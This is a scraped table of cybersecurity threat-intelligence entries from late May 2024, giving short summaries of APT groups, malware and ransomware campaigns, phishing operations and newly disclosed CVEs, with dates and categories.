|
January(137) February(207) March(430) April(317) May(278) June(186) |
i |
|
DATE |
NAME |
CATEGORY |
SUBCATE |
INFO |
|
31.5.24 |
GRU’s
BlueDelta Targets Key Networks in Europe |
REPORT | REPORT | GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns |
|
31.5.24 |
BlueDelta | Operation | Operation | GRU's BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns |
|
31.5.24 |
Doppelganger | Operation | Operation | This page is designed to gather a timeline of the Doppelganger operation with a few elements collected from different reports. |
|
31.5.24 |
AI
and Covert Influence Operations: Latest Trends |
REPORT | AI | OpenAI is committed to enforcing policies that prevent abuse and to improving transparency around AI-generated content. |
|
31.5.24 |
UAC-0006 | Group | Group | UAC-0006 is a financially motivated threat actor that has been active since at least 2013. They primarily target Ukrainian organizations, particularly accountants, with phishing emails containing the SmokeLoader malware. Their goal is to steal credentials and execute unauthorized fund transfers, posing a significant risk to financial systems. |
|
31.5.24 |
CVE-2024-1086 |
CVE |
A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. | |
|
31.5.24 |
CVE-2023-38831 |
CVE |
RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. | |
|
31.5.24 |
FlyingYeti | Group | Group | Cloudforce One is publishing the results of our investigation and real-time effort to detect, deny, degrade, disrupt, and delay threat activity by the Russia-aligned threat actor FlyingYeti during their latest phishing campaign targeting Ukraine. |
|
31.5.24 |
Malicious activity by LilacSquid threat group | ALERTS | GROUP | A recently disclosed infostealing campaign attributed to the threat group known as LilacSquid has been active since at least 2021. As reported by Cisco Talos, the attackers have been targeting vulnerable public-facing servers and leveraging compromised RDP credentials to deploy a wide range of tools and malware in their attacks. |
|
31.5.24 |
Unveiling cryptocurrency mining tactic of the 8220 Gang | ALERTS | CRYPTOCURRENCY | The 8220 Gang, a widely recognized threat actor based in China and driven by financial motives, has been active since 2017. Specializing in deploying cryptocurrency-mining malware, they primarily target cloud-based environments and Linux servers, exploiting known application vulnerabilities as part of their tactics, techniques, and procedures (TTPs). |
|
31.5.24 |
SmallTiger malware campaign reported targeting Korean companies | ALERTS | CAMPAIGN | A malware campaign distributing SmallTiger malware has been reported targeting Korean companies in the defence, automobile parts, and semiconductor manufacturing sectors. This malware acts as a downloader, connecting to the attackers' C&C server to fetch and execute the final payload in memory. |
|
30.5.24 |
AhMyth | Malware | Android | AhMyth is malware that spreads through a few different infection vectors and uses various means to collect and exfiltrate sensitive information from infected devices. |
|
30.5.24 |
RedTail | Malware | Cryptocurrency | RedTail Cryptominer Threat Actors Adopt PAN-OS CVE-2024-3400 Exploit |
|
30.5.24 |
CVE-2023-6961 |
CVE |
(CVSS score: 7.2) - Unauthenticated Stored Cross-Site Scripting in WP Meta SEO <= 4.5.12 | |
|
30.5.24 |
CVE-2023-40000 |
CVE |
(CVSS score: 8.3) - Unauthenticated Stored Cross-Site Scripting in LiteSpeed Cache <= 5.7 | |
|
30.5.24 |
CVE-2024-2194 |
CVE |
(CVSS score: 7.2) - Unauthenticated Stored Cross-Site Scripting in WP Statistics <= 14.5 | |
|
30.5.24 |
LilacSquid | Group | Group | The stealthy trilogy of PurpleInk, InkBox and InkLoader |
|
30.5.24 |
BitRAT and Lumma Stealer spread as fake browser updates | ALERTS | Virus | A new campaign delivering BitRAT and Lumma Stealer malware has been observed in the wild. The malware is spread via fake browser updates. The attack chain is initiated by users visiting compromised websites and triggering malicious Javascript code redirecting them to fake update websites. Further down the chain, malicious PowerShell scripts lead to the retrieval of malware loaders and final payload execution. The attackers can leverage the delivered payloads to gain control over the compromised endpoints, remote command execution, and infostealing purposes. |
|
30.5.24 |
Metamorfo Banking Trojan | ALERTS | Virus | Metamorfo is a banking Trojan malware (aka Casbaneiro) that is spread through malspam campaigns luring users to click on HTML attachments. The HTML attachment contains malicious code that kicks off processes with the main focus on exfiltrating victims’ financial information including banking credentials. |
|
30.5.24 |
Datebug updating toolkits with Golang to be cross-platform | ALERTS | APT | APT group Datebug, in operation since 2013, has been observed updating their toolkit with a new data exfiltration tool written in Golang created with the goal of targeting APAC governments and defense sectors. The group utilizes phishing emails to lure recipients into opening an attached or linked malicious ZIP or ISO file which leads to the data exfiltration tool being installed. |
|
30.5.24 |
NSIS-based packer usage observed in many common malware families | ALERTS | Virus | The Nullsoft Scriptable Install System (NSIS) is a commonly seen open source software used by cybercriminals for generating malware. This system is used to generate self-extracting custom installers which have been observed delivering many different malware families. In a recent report by Check Point Research, they have provided details on a group of packers using this system. |
|
30.5.24 |
CatDDoS: A rising threat across multiple sectors | ALERTS | BOTNET | A rise in activity involving a Mirai distributed denial-of-service (DDoS) botnet variant called CatDDoS has been observed. Multiple threat actors are employing various CatDDoS variants to target organizations across multiple sectors, including cloud vendors, communication providers, scientific and research entities, and educational institutions. The vulnerabilities exploited under CatDDoS affect numerous products and technologies, such as Jenkins servers, Apache ActiveMQ servers, Apache Log4j, Cisco Linksys, and NetGear routers, among others. |
|
30.5.24 |
Mexican Telecom Continuously Impersonated by SpyNote Actor | ALERTS | Virus | Since at least October 2023, a SpyNote actor has been abusing the brand of a well-known and prominent telecommunications company in Mexico that operates extensively across Latin America and the Caribbean, serving millions of customers in countries such as Argentina, Brazil, Chile, Colombia, and many more. |
|
30.5.24 |
AllaSenha - new AllaKore malware variant | ALERTS | Virus | AllaSenha is a new banking malware variant from the AllaKore RAT family that has recently been used in distribution campaigns targeted at banking users in Brazil. The multi-staged infection chain leverages malicious .lnk files possibly delivered through phishing, BPyCode launcher binaries and a DLL loader dubbed ExecutorLoader that leads to the final AllaSenha payload. The malware functionality focuses on theft of user credentials associated with Brazil’s most popular banks. The targeted data includes passwords, QR codes and 2FA tokens. The malware abuses Azure Cloud infrastructure for the purpose of C2 communication and data exfiltration. |
|
30.5.24 |
Zonix Ransomware | ALERTS | RANSOM | Zonix is a recently discovered ransomware variant from the Xorist malware family. The malware encrypts user files and appends the ".ZoN" extensions to them. Zonix drops a ransom note as a text file called "HOW TO DECRYPT FILES.txt" and also displays a pop-up window on the desktop demanding 1500 USD in bitcoin for the decryption of the locked files. |
|
30.5.24 |
CVE-2024-32640 - SQL Injection vulnerability in Mura/Masa CMS | ALERTS | VULNEREBILITY | CVE-2024-32640 is a recently disclosed SQL injection vulnerability affecting Mura/Masa CMS, which is an open source enterprise content management system. If successfully exploited the vulnerability might allow unauthorized attackers to access sensitive data. The product vendor has already released a patch to remediate this vulnerability in software versions 7.4.6, 7.3.13 and 7.2.8. |
|
30.5.24 |
Emergence of a new North Korean threat actor dubbed Moonstone Sleet | ALERTS | APT | A recent emergence in the threat landscape involves a new North Korean actor dubbed Moonstone Sleet. This actor has been detected engaging in various deceptive tactics, including the establishment of fake companies and job listings to lure potential targets. Additionally, they have been distributing trojanized versions of legitimate software tools, developing malicious games, and introducing a novel custom ransomware named FakePenny, comprising a loader and an encrypter. Their targets span individuals and organizations across sectors such as software and information technology, education, and defense industrial base. |
|
30.5.24 |
Fraudulent PDF Viewer Login Pages Phishing for User Credentials | ALERTS | PHISHING | A phishing campaign was recently observed where a malicious HTML attachment masquerading as a PDF Viewer login page prompts users to verify their password to access a document. Meanwhile, hidden in the background, a malicious JavaScript will attempt to steal the victim's credentials. |
|
30.5.24 |
Agent Tesla: The Uninvited Guest at Indonesia's GEMASTIK 2024 Event | ALERTS | Virus | Symantec has recently observed a peculiar malspam campaign in Indonesia where the actor is running a sophisticated email scheme impersonating the School of Electrical Engineering and Informatics (STEI) at the Institut Teknologi Bandung (ITB) in Indonesia. |
|
30.5.24 |
Red Akodon threat group recent activities | ALERTS | Virus | According to recent report published by SCITUM, Red Akodon is a new threat group conducting its malicious activities prevalently in Colombia since at least April 2024. The threat actors have been observed to target various public organizations and other businesses with a variety of commodity malware variants such as Remcos, QuasarRAT, Neshta, XWorm or AsyncRAT. The attack chain often relies on phishing emails coming from compromised accounts. The attackers have been leveraging malicious .svg files either directly attached in malspam or hosted on public file hosting repositories. The attacks conducted by this threat group aim at information exfiltration and gaining control over the compromised endpoints. |
|
30.5.24 |
TXZ file extension: Evolution of malware distribution in email campaigns | ALERTS | Virus | Threat actors usually send malicious emails with attachments carrying a malicious payload, or they send out containers which include files like archives. In a recent campaign, multiple emails carrying files with the TXZ extension as attachments were observed. Late last year, Microsoft added native support to Windows 11 for the TXZ filetype. This means recipients of the malicious messages would have been able to open the TXZ attachment using Windows File Explorer if they are using the Windows 11 operating system. This shows that TXZ campaigns are actively used in some regionally targeted campaigns and can grow in the future with the adoption of Windows 11 or higher. |
|
30.5.24 |
Gipy malware distributed under the disguise of AI voice generator tools | ALERTS | Virus | A new malicious campaign spreading infostealing malware dubbed Gipy has been observed in the wild. The malware binaries are masqueraded as an AI voice generator tool and distributed via phishing websites. Some examples of the package names observed for this malware are as follows: VoiceAIbeta-x64.exe, VoiceAIAdvancedPro.exe, VoiceAiPro-x64.exe, VoiceAIChanger.exe, etc. Next to typical infostealing features, the malware has capabilities to download and execute additional arbitrary payloads. Various malware families have been observed among the malware payloads downloaded by Gipy, including: Lumma Stealer, Redline Stealer, DCRat, RadxRAT, RisePro, TrueClient and more. |
|
30.5.24 |
Operation Endgame | BigBrother | BigBrother | International law enforcement and partners have joined forces. We have been investigating you and your criminal undertakings for a long time and we will not stop here. |
|
30.5.24 |
Detecting Cross-Origin Authentication Credential Stuffing Attacks | Incident | Incident | Okta has determined that the cross-origin authentication feature in Customer Identity Cloud (CIC) is prone to being targeted by threat actors orchestrating credential-stuffing attacks. |
|
30.5.24 |
PyPI crypto-stealer | Malware | Python | PyPI crypto-stealer targets Windows users, revives malware campaign |
|
29.5.24 |
CVE-2024-24919 |
CVE |
Important Security Update – Stay Protected Against VPN Information Disclosure (CVE-2024-24919) | |
|
29.5.24 |
AllaSenha | Malware | RAT | ALLASENHA: ALLAKORE VARIANT LEVERAGES AZURE CLOUD C2 TO STEAL BANKING DETAILS IN LATIN AMERICA |
|
29.5.24 |
Moonstone Sleet | Group | APT | Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks |
|
28.5.24 |
CVE-2024-23109 |
CVE |
An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests. | |
|
28.5.24 |
CVE-2024-23108 |
CVE |
An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests. | |
|
28.5.24 |
DNSBOMB: A New Practical-and-Powerful Pulsing DoS Attack Exploiting DNS Queries-and-Responses | Papers | DNS | DNSBomb is a new practical and powerful pulsing DoS attack exploiting DNS queries and responses. |
|
28.5.24 |
DNSBomb | Hacking | DNS | DNSBomb is a new practical and powerful pulsing DoS attack exploiting DNS queries and responses. |
|
28.5.24 |
CatDDoS Botnet | BOTNET | BOTNET | XLab's CTIA(Cyber Threat Insight Analysis) System continuously tracks and monitors the active mainstream DDoS botnets. Recently, our system has observed that CatDDoS-related gangs remain active and have exploited over 80 vulnerabilities over the last three months. Additionally, the maximum number of targets has been observed to exceed 300+ per day. |
|
28.5.24 |
Server Side Credit Card Skimmer Lodged in Obscure Plugin | Hacking | Hacking | Attackers are always finding new ways to inject malware into websites and new ways to obscure it to avoid detection, but they’re always up to their same old tricks. In this post, we’ll explore how attackers are using a very obscure PHP snippet WordPress plugin to install server-side malware to harvest credit card details from a WooCommerce online store. |
|
28.5.24 |
Remote Command Execution on TP-Link Archer C5400X |
CVE |
Before the release of our binary zero-day identification feature, we tested and validated it on our firmware corpus to make sure we were providing meaningful analysis results. In the process, we identified numerous vulnerabilities that we reported to vendors. | |
|
28.5.24 |
CVE-2024-5035 |
CVE |
The affected device expose a network service called "rftest" that is vulnerable to unauthenticated command injection on ports TCP/8888, TCP/8889, and TCP/8890. | |
|
28.5.24 |
Embargo Ransomware | ALERTS | RANSOM | Embargo is a new Rust-based ransomware variant identified in the wild. The malware encrypts user files and appends “.564ba1” extension to them. Ransom note is dropped in form of a text file called “HOW_TO_RECOVER_FILES.txt” advising the victims to register on the attackers portal via the provided onion site link. The threat actors behind this malware have been reported to be employing the double extortion technique by not only encrypting confidential data but also by exfiltrating it and threatening the victims with public release. |
|
28.5.24 |
Rising popularity of Arc browser overshadowed by malvertising campaign | ALERTS | CAMPAIGN | The Arc browser, developed by The Browser Company, has been gaining a lot of popularity in the market, promising to personalize the way users browse the internet. With its innovative user interface design that sets it apart from traditional browsers, it started receiving even more attention after becoming available for Windows, whereas previously it was only intended for macOS systems. |
|
28.5.24 |
Phishing campaign targeting financial institutions impersonates medical center | ALERTS | PHISHING | A phishing campaign targeting European and US financial institutions has been reported. The attacks involve sending emails impersonating a medical center, with SCR files disguised as financial documents to trick victims into downloading and executing them. These files contain code from a Python clone of the Minesweeper game, along with malicious Python code that downloads additional scripts from a remote source. The scripts are then used to extract and run a legitimate remote computer management program called SuperOps RMM which provides unauthorized remote access to victims' computers. |
|
28.5.24 |
Iluria Stealer | ALERTS | Virus | There have been reports of in-the-wild activity for a run-of-the-mill stealer known as Iluria. Like many other forks and variants of Discord Stealers, it is capable of stealing tokens, browser credentials, and payment information. The malware is currently being advertised, and for now, consumers appear to be the focus via drive-by-download attacks. In addition, multiple tests are also being observed. |
|
28.5.24 |
Rise of Fake AV websites hosting advanced malware | ALERTS | Virus | Recently, there has been an increase in the number of fake antivirus (AV) websites pretending to be legitimate solutions. These deceptive sites have been found hosting advanced malicious files, such as APKs, EXEs, and Inno Setup installers, which can deliver spyware like the Spynote Trojan and data-stealing malwares such as Lummna and StealC. These malicious programs are adept at harvesting victim information, including browser data, and sending it to remote servers under the control of attackers. |
|
28.5.24 |
CVE-2024-30268: XSS Vulnerability in Cacti | ALERTS | VULNEREBILITY | CVE-2024-30268 is a reflected cross-site scripting vulnerability in Cacti, a network monitoring and fault management framework. If successfully exploited, this vulnerability allows attackers to obtain the cookies of the administrator and fake their login using the cookies. The vulnerability has been fixed in versions 1.3.x DEV. Symantec's network protection technology, Intrusion Prevention System (IPS), blocks these vulnerability exploitation attempts to prevent further infection/damage to the system. |
|
28.5.24 |
CVE-2024-21793 and CVE-2024-26026 - two recent vulnerabilities affecting F5 BIG-IP Next Central Manager | ALERTS | VULNEREBILITY | CVE-2024-21793 and CVE-2024-26026 are two recently identified high severity vulnerabilities affecting the F5 BIG-IP Next Central Manager. Both flaws are code injection vulnerabilities and have been given the CVSS score of 7.5. If successfully exploited they might allow unauthenticated attackers to run malicious SQL statements through the BIG-IP Central Manager API. |
|
28.5.24 |
CVE-2020-17519: Directory Traversal Vulnerability in Apache Flink | ALERTS | VULNEREBILITY | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently added a three-year-old directory traversal vulnerability (CVE-2020-17519) in Apache Flink to the Known Exploited Vulnerabilities Catalog. Apache Flink is an open-source batch-processing framework used for distributed processing of streaming data and is widely used in the field of big data. If successfully exploited, this vulnerability allows unauthenticated attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. |
|
28.5.24 |
Android Bankbot impersonates Uzbekistan banks | ALERTS | Virus | In recent days, mobile users in Uzbekistan have been targeted by an Android BankBot campaign where actors are disguising their malware as fictitious banking apps (Xalq Banki Credit.apk & Bank Ipak.apk), impersonating two Uzbekistan banks: Xalq Banki and Ipak Yuli. If a user is successfully lured into installing these on their mobile phone, BankBot will monitor for when the user launches any banking apps it is coded to target. It will then leverage the classic overlay technique, overlaying a fake page on top of the legitimate one in order to steal the user's inputs, such as credentials. At this time, the vector of infection remains unknown but it's very likely that these are being spread via malicious SMS messages or redirections. |
|
27.5.24 |
Storm-0539 | Group | Group | Navigating cyberthreats and strengthening defenses in the era of AI |
|
27.5.24 |
HTML Smuggling | Hacking | HTML | HTML smuggling is an innovative attack technique, which abuses HTML5 and JavaScript features to inject or extract data across network boundaries. |
|
27.5.24 |
Transparent Phishing and HTML Smuggling | Hacking | Phishing | Phishing with Cloudflare Workers: Transparent Phishing and HTML Smuggling |
|
27.5.24 |
Transparent Tribe | Campaign | Campaign | Transparent Tribe Targets Indian Government, Defense, and Aerospace Sectors Leveraging Cross-Platform Programming Languages |
|
25.5.24 |
Group |
Space Pirates: analyzing the tools and connections of a new hacker group |
||
|
25.5.24 |
Path Traversal Vulnerability in Nexus Repository CVE-2024-4956 |
VULNEREBILITY |
CVE-2024-4956 is a path traversal vulnerability in Sonatype Nexus Repository 3. Nexus Repository is a widely used artifact repository manager. If successfully exploited, this vulnerability will allows unauthenticated remote attackers to access and download sensitive system files, application source code and configurations. The CVSS score of this vulnerability was 7.5. Symantec's network protection technology, Intrusion Prevention System (IPS) blocks these vulnerability exploitation attempts to prevent further infection/damage to the system. |
|
|
25.5.24 |
APT |
An ongoing campaign dubbed Operation Diplomatic Specter, targeting political entities in the Middle East, Africa, and Asia, has been reported. A Chinese APT group behind the campaign has been leveraging rare email exfiltration techniques against compromised servers. |
||
|
25.5.24 |
RustDoor malware exploits JAVS Viewer vulnerability in courtroom software |
Virus |
A Windows-based malware named RustDoor has been observed being distributed via a compromised audio-visual recording software package used in courtroom environments. This backdoor enables attackers to gain full control of affected systems and transmit data about the host system to a command-and-control (C2) server. The malware exploits a deserialization vulnerability in JAVS Viewer software, tracked as CVE-2024-4978. JAVS technologies are utilized in courtrooms, jails, prisons, councils, hearings, and lecture halls nationwide, with more than 10,000 installations worldwide. |
|
|
25.5.24 |
CVE |
Type Confusion in V8. Reported by Clément Lecigne of Google's Threat Analysis Group and Brendon Tiszka of Chrome Security on 2024-05-20 |
||
|
25.5.24 |
Group |
No sleep until the Cybercrime Fighters Club is done with finding the answer as to who is behind this new ransomware-as-a-service affiliate. |
||
|
25.5.24 |
CVE |
CVE-2024-4978: Backdoored Justice AV Solutions Viewer Software Used in Apparent Supply Chain Attack |
||
|
25.5.24 |
RAT |
BLOODALCHEMY used in attacks targeting government organizations in Southern and Southeastern Asia is in fact an updated version of Deed RAT, which is believed to be a successor to ShadowPad. |
||
|
25.5.24 |
RAT |
Malware Transmutation! - Unveiling the Hidden Traces of BloodAlchemy |
||
|
24.5.24 |
Hacking |
ESXi Ransomware Attacks: Evolution, Impact, and Defense Strategy |
||
|
24.5.24 |
CVE |
A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. |
||
|
24.5.24 |
APT |
SHARP DRAGON EXPANDS TOWARDS AFRICA AND THE CARIBBEAN |
||
|
23.5.24 |
APT |
As reported by Checkpoint, Sharp Dragon APT group (also formerly known as Sharp Panda) has been expanding its operations towards targets in Africa and in the Caribbean. Sharp Dragon is known to use large-scale phishing attacks, malicious RTF files, DLL-loaders but most recently also executable loaders disguises as documents. The threat group has also been reported to leverage CVE-2023-0669 RCE vulnerability affecting Fortra GoAnywhere in their attacks. |
||
|
23.5.24 |
VULNEREBILITY |
CVE-2024-29895 is a critical (CVSS score 10) command injection vulnerability affecting Cacti, which is a network monitoring and fault management framework. If successfully exploited the vulnerability may allow unauthenticated remote attackers to execute arbitrary commands on the affected servers through URL manipulation. While the vulnerability has not yet been reported as being exploited in the wild, a Proof of Concept for it is publicly available. The product vendor has already released a patch to remediate this vulnerability. |
||
|
23.5.24 |
HACKING |
Waltuhium is an open-source infostealer that has been observed being shared in dark web forums. It is claimed to have features such as keylogging, screenshot capturing, WiFi stealing, Discord injection, password stealing, credit card stealing, cryptocurrency and wallet stealing, as well as tokens from Discord and browsers, and session stealing. Additionally, it has anti-VM and anti-debug functionality. The stolen data is zipped and posted to a defined Discord webhook server. |
||
|
23.5.24 |
Virus |
GuLoader, an advanced downloader, is showing no signs of stopping, and its prevalence continues to increase with more and more campaigns observed around the world. One campaign was recently identified where actors are posing as a known Italian company that specializes in the wholesale and retail distribution of seafood, sourcing and importing its products from various countries. |
||
|
23.5.24 |
CLOUD#REVERSER campaign leverages cloud storage for malware delivery |
CAMPAIGN |
A new campaign dubbed CLOUD#REVERSER has been reported to abuse various cloud storage repositories such as Dropbox or Google Drive for malware delivery and C&C purposes. The attackers leverage phishing emails with malicious attachments in the initial attack stages and several VBScript and PowerShell-based payload executions in later stages. The dropped malware has the functionality to exfiltrate user data, execute arbitrary commands and scripts received from the attackers as well as download additional binaries and execute them on the infected endpoints. |
|
|
23.5.24 |
Virus |
Acrid is a recently identified C++-based infostealing malware. In its functionality, it is very similar to other infostealer variants present currently in the threat landscape. Its main functionality relies on collecting various user data from the compromised endpoints and exfiltration to the C&C servers controlled by the attackers. Acrid focuses on the theft of data such as browser cookies, passwords stored in browsers, banking information, cryptocurrency wallets, and credentials stored in various applications. Acrid has been reported to leverage a "Heaven’s Gate" technique that effectively enables 64-bit code to be executed within a 32-bit process, potentially allowing the malware to evade security controls monitoring only 32-bit processes. |
||
|
23.5.24 |
CVE-2023-43208 - NextGen Healthcare Mirth Connect RCE vulnerability exploited in the wild |
VULNEREBILITY |
CVE-2023-43208 is a Remote Code Execution (RCE) vulnerability disclosed in October last year. The vulnerability affects NextGen Healthcare Mirth Connect prior to version 4.4.1, which is an open-source data integration suite used by healthcare companies. If exploited the vulnerability may allow unauthenticated remote attackers to execute code on affected systems, leading to the compromise of critical healthcare data. The vulnerability has been reported as being exploited in the wild and has been added to the "Known Exploited Vulnerabilities Catalog" (KEV) by CISA. |
|
|
23.5.24 |
GhostEngine malware terminates EDR agents and deploys coin miner |
Virus |
A multimodule malware dubbed GhostEngine has been observed in the wild. This malware leverages vulnerable drivers to terminate and delete known Endpoint Detection and Response (EDR) agents that would likely interfere with the deployed coin miner. |
|
|
23.5.24 |
Operation |
Operation Diplomatic Specter: An Active Chinese Cyberespionage Campaign Leverages Rare Tool Set to Target Governmental Entities in the Middle East, Africa and Asia |
||
|
23.5.24 |
CVE |
Avalanche 6.4.3.602 - additional security hardening and CVE fixed |
||
|
23.5.24 |
Group |
Deep Dive Into Unfading Sea Haze: A New Threat Actor in the South China Sea |
||
|
23.5.24 |
Elastic Security Labs has identified REF4578, an intrusion set incorporating several malicious modules and leveraging vulnerable drivers to disable known security solutions (EDRs) for crypto mining. |
|||
|
23.5.24 |
Exchange |
Positive Technologies detects a series of attacks via Microsoft Exchange Server |
||
|
22.5.24 |
Smishing: Fake IRS Scare Tactic to Snatch Cryptowallets' 12-Word Recovery Phrases |
PHISHING |
Symantec has recently observed a malicious SMS campaign in the US targeting mobile users' cryptowallet 12-word recovery phrases. The actors are impersonating the IRS and using a scare tactic related to cryptocurrency holdings declaration. |
|
|
22.5.24 |
Virus |
A new v5.6 variant of the XWorm malware has been observed in the wild. The malware is distributed under the disguise of various applications, games or adult content, with the binaries spread through either online sharing repositories or via torrent downloads. XWorm has miscellaneous capabilities including keylogging, data theft, download of additional arbitrary payloads, RAT functionalities and others. |
||
|
22.5.24 |
Malware campaign uses LNK files and MSBuild to likely deliver TinyTurla backdoor |
Virus |
A malware campaign utilizing malicious LNK files has been observed. The threat actors behind the campaign are using human rights seminar invitations and public advisories to lure users. Once lured, MSBuild is used to execute and deliver a fileless final payload. This payload is believed to be the TinyTurla backdoor, based on its first-stage backdoor functionalities and utilization of a specific C2 infrastructure. |
|
|
22.5.24 |
Virus |
A new campaign attributed to the Grayfly threat group (aka APT41) has been distributing the Keyplug modular malware to various organizations in Italy. As reported by Yoroi, this C++based malware comes in variants supporting both Windows and Linux platforms. Keyplug has the capabilities to initiate the C2 communication with attacker servers either via abuse of CloudFlare's CDN (Content Delivery Network) and via the WSS protocol. |
||
|
22.5.24 |
CVE |
(CVSS score: 2.7), which allows a privileged user to read backup session logs |
||
|
22.5.24 |
CVE |
(CVSS score: 7.2), which allows a privileged user to steal NTLM hashes of a Veeam Backup Enterprise Manager service account if it's not configured to run as the default Local System account |
||
|
22.5.24 |
CVE |
(CVSS score: 8.8), which allows account takeover via NTLM relay |
||
|
22.5.24 |
CVE |
(CVSS score: 9.8), the vulnerability could allow an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as any user. |
||
|
22.5.24 |
CVE |
A set of buffer overflow vulnerabilities that could allow authenticated users to execute arbitrary code via a network |
||
|
22.5.24 |
CVE |
A set of buffer overflow vulnerabilities that could allow authenticated users to execute arbitrary code via a network |
||
|
22.5.24 |
CVE |
A set of buffer overflow vulnerabilities that could allow authenticated users to execute arbitrary code via a network |
||
|
22.5.24 |
CVE |
A double free vulnerability that could allow authenticated users to execute arbitrary code via a network |
||
|
22.5.24 |
CVE |
An incorrect permission assignment for critical resource vulnerability that could allow authenticated users to read or modify the resource via a network |
||
|
22.5.24 |
InfoStealer |
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware |
||
|
22.5.24 |
CVE |
An authentication bypass vulnerability was present in the GitHub Enterprise Server (GHES) when utilizing SAML single sign-on authentication with the optional encrypted assertions feature. |
||
|
22.5.24 |
CVE |
llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. |
||
|
21.5.24 |
CVE |
NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. Note that this vulnerability is caused by the incomplete patch of CVE-2023-37679. |
||
|
21.5.24 |
CVE |
A memory corruption vulnerability in Fluent Bit versions 2.0.7 thru 3.0.3. This issue lies in the embedded http server’s parsing of trace requests and may result in denial of service conditions, information disclosure, or remote code execution. |
||
|
21.5.24 |
Deuterbear RAT targets Asia-Pacific in advanced cyber espionage campaign |
Virus |
A cyber espionage campaign has been reported targeting the Asia-Pacific region, involving the deployment of a remote access trojan (RAT) called Deuterbear. The RAT exhibits advanced capabilities, such as anti-analysis techniques, avoiding handshakes during RAT operation, anti-memory scanning, and using HTTPS for command-and-control (C&C) communication. The Deuterbear infection chain involves two stages: the first stage functions as a plugin downloader, while the second stage acts as a backdoor, harvesting sensitive information from the compromised host. |
|
|
21.5.24 |
Virus |
Reports have emerged of a new infostealer, dubbed SamsStealer, circulating in the threat landscape. This malware covertly infiltrates victims' systems, exfiltrating various forms of personal data, including login credentials, cryptocurrency wallets, session data, and browsing history. The stolen data is transmitted to file-sharing services and messaging platforms like Telegram, which are used as command-and-control (C2) servers by the attackers. |
||
|
21.5.24 |
Bank Mellat Users in Various Countries Targeted by FakeBank Campaign |
CAMPAIGN |
Symantec has observed an Android FakeBank campaign targeting mobile users of a private Iranian bank known as Mellat, by posing as a fictitious banking app (Mellat.apk). Bank Mellat, also known as "Bank of the Nation", has a number of offices and branches both domestically within Iran and internationally. |
|
|
21.5.24 |
Virus |
Recently, a Vultur campaign has been observed in which the actor is disguising it as a known antivirus mobile application (<company name>_Security.apk). This Android banking malware leverages the overlay technique, displaying fake overlay windows in the hope of tricking users into entering their banking credentials. It targets hundreds of banks and cryptocurrency exchange platforms. |
||
|
21.5.24 |
Virus |
HijackLoader is a multi-stage loader that has recently seen some updates. The first stage allows the loader decrypt and decompress additional modules and execute a second stage while the second stage process lives in memory to read an embedded or remotely hosted image in order to fully initiate the second stage and load additional modules. Some of the newly discovered modules, like User Account Control bypass, are design to allow for additional persistence in the target environment. |
||
|
21.5.24 |
Virus |
Antidot is a recently discovered banking trojan for Android. The malware is distributed under the disguise of a Google Play update app. Functionality-wise Antidot is capable of keylogging, overlay attacks, SMS exfiltration, screen captures, credentials theft, device control and execution of commands received from the attackers. Malware has the capability to establish http connections or WebSocket communication to the C2 servers. |
||
|
21.5.24 |
RANSOM |
As the Chaos Ransomware builder is widely available to the public, instances are observed on a daily basis around the world with both consumers and enterprises being targeted. Recently, one actor has been luring consumers, more specifically gamers, with a Chaos Ransomware disguised as a fake free Discord Nitro. Within the ransom note, the actor is hoping to extort compromised users of 0.003 BTC, which is the equivalent of 195 USD at the time of writing. |
||
|
21.5.24 |
RANSOM |
Synapse is a ransomware written in C that can encrypt local files, files on removable drives, and files stored on network shares, with the capability of propagating to other systems on a network. Encrypted files will have the extension .Synapse added to them. Additionally, a ransom note named [random_string].README.txt is dropped. The ransomware has the capability to collect system information and encryption statistics, and exfiltrate the data to its remote C2 server. Victims are provided with a URL (hosted on the Tor network) as a means of contact. |
||
|
21.5.24 |
Storm-1811 threat actor conducts Vishing attack via Quick Assist tool |
GROUP |
Threat actor Storm-1811 has been reported carrying out a vishing (voice phishing) attack using the client management tool Quick Assist. Quick Assist is an application that enables a user to share their system with another person over a remote connection to resolve issues. Once the user grants full control, the threat actor executes scripts that lead to the download of batch files with the aim of deploying Black Basta ransomware as the final payload throughout the network. |
|
|
21.5.24 |
APT |
In a newly released report, Symantec’s Threat Hunter Team sheds light on a recently discovered Linux backdoor developed by the North-Korean Springtail espionage group (aka Kimsuky). This group is linked to malware used in a recent campaign against organizations in South Korea. The campaign leveraged Trojanized software installation packages to deliver the backdoor. |
||
|
21.5.24 |
Wipper |
No-Justice Wiper - Wiper attack on Albania by Iranian APT) |
||
|
21.5.24 |
Wipper |
Iranian State Actors Conduct Cyber Operations Against the Government of Albania |
||
|
21.5.24 |
Group |
BAD KARMA, NO JUSTICE: VOID MANTICORE DESTRUCTIVE ACTIVITIES IN ISRAEL |
||
|
21.5.24 |
Group |
GitCaught: Threat Actor Leverages GitHub Repository for Malicious Infrastructure |
||
|
20.5.24 |
Loader |
The LATRODECTUS loader evolves to deliver ICEDID and other malware |
||
|
